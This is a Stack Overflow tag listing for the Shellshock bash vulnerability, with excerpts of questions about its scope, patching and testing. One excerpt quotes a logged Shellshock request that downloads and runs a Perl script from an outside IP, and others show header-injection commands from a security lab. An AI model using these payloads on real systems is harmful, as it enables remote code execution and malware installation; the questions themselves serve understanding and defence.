Stack Overflow
Stack Overflow

Questions tagged [shellshock-bash-bug]

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

For more information, see CVE-2014-6271 and CVE-2014-7169

40 questions
2
votes
1 answer

Does bash exploit (CVE-2014-6271) require terminal access to utilize?

With all the scare regarding CVE-2014-6271, I've found little concrete information regarding the vulnerability's surface area. In particular, does an individual require terminal access to execute this exploit? I am aware that CGI services that…
Justin Bell
  • 396
  • 1
  • 10
2
votes
1 answer

Impact of BASH bug on Azure Websites, Cloud Services and SQL Database?

Just been reading about this potentially serious Linux based bug. It would seem that Azure should be on the safe side, as being Windows based, and most likely quickly patched, as that is why we use Platform As A Service (PAAS). For anybody…
SamJolly
  • 6,347
  • 13
  • 59
  • 125
2
votes
2 answers

How to check and upgrade Bash on FreeBSD - related to the Shellshock bug

I read the article A Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271) this morning when I came into work. I have updated Bash on most of my systems that I am responsible for, however, I was asked to…
Django Fett
  • 77
  • 2
  • 11
1
vote
1 answer

Non imported environment variable with shellshock fixed bash version

I have a simple bash script which modifies a environment variable that will be used by subsequent binary. Bellow my basic script: #!/bin/bash export DBROOT="NEW_DIRECTORY" export TERM=xterm su -c " " - omni DBROOT variable is used…
Mou
  • 23
  • 4
1
vote
3 answers

Bash script does not ssh all the entries of a csv file

I am trying to patch a bunch of CENT OS machines with the latest fix pack. I have the below bash script that takes csv file as a input which has the ip address and password for those machines. The code works fine however, it would only work for the…
user3846091
  • 1,625
  • 6
  • 24
  • 29
1
vote
3 answers

bash shellshock jurat Perl script

I saw the following line under /var/log/apache2/access_log: "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\"" I…
wcochran
  • 10,089
  • 6
  • 61
  • 69
1
vote
1 answer

Does using Python on OS X expose me to Shellshock?

Various outlets, along with Apple, are assuring OS X users that they are not at particular risk from the Shellshock bash exploit. However, I use Python frequently on my system and wonder if that would increase my risk; and whether there is anything…
orome
  • 45,163
  • 57
  • 202
  • 418
1
vote
1 answer

Can someone explain how this "Shellshock" code works in shell

I read in the news that Shellshock is another bigger vulnerability after Heartbleed. The code to test if our Bash shell is vulnerable or not is: env X="() { :;} ; echo shellshock" /bin/sh -c "echo completed" In detail, how does this code exactly…
Jassi
  • 521
  • 6
  • 31
1
vote
2 answers

patching bash shell shock bug from source

I am running a non-standard version of Ubuntu and I tried to patch the shell shock bug by downloading and recompiling from the source, following the instructions from https://news.ycombinator.com/item?id=8364385 . After make install, running bash…
JRR
  • 6,014
  • 6
  • 39
  • 59
1
vote
2 answers

The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?

Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability. I am trying to understand if it can affect my server via my Perl CGI scripts. Can my code be affected in a malicious way - what would my code need to do to…
Roman Gelembjuk
  • 1,797
  • 2
  • 25
  • 50
1
vote
3 answers

Strange Bash function export for the Shellshock bug

Why does the code date bash -c "date" declare -x date='() { echo today; }' #aka export date='() { echo today; }' date bash -c "date" print Wed Sep 24 22:01:50 CEST 2014 Wed Sep 24 22:01:50 CEST 2014 Wed Sep 24 22:01:50 CEST 2014 today ? Where (and…
clt60
  • 62,119
  • 17
  • 107
  • 194
0
votes
1 answer

Why can't I get the ShellShock Bash bug to reproduce on Bash 4.2.0?

I am learning about the ShellShock vulnerability and I wanted to test older versions of Bash. I downloaded Bash 4.2 from GNU website. After extracting the content, I compiled it based on GNU guide like that: bash ./configure make After it finished…
E235
  • 11,560
  • 24
  • 91
  • 141
0
votes
0 answers

How does echo; helps in this context

The below line works just fine and gets the file- wget -U "() { :;}; echo; /bin/task1 hello" http://10.0.0.1:6262/cgi-bin/shellshock.cgi However, if I skip the "echo;", it throws 500 internal server error. wget -U "() { :;}; /bin/task1 hello"…
krishna
  • 13
  • 2
0
votes
1 answer

Agent field is set but not run the function in shell shock

I try to solve seed lab shell shock vulnerability lab in that, i set the agent field by bellow command Curl -A "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l " http://localhost/cgi-bin/sample.cgi The out put is still the hello word…
AliSafari186
  • 113
  • 9
0
votes
1 answer

Why isn't my bash 4.1.2 package vulnerable to shellshock? Is my test wrong?

My Bash shell version is GNU bash, version 4.1.2(2)-release (x86_64-redhat-linux-gnu). I tested shellshock bug by using below command x='() { :;}; echo VULNERABLE' bash -c :. It was not printed VULNERABLE message back. I have read that the bug…
Jobs
  • 1,257
  • 2
  • 14
  • 27
1
2
3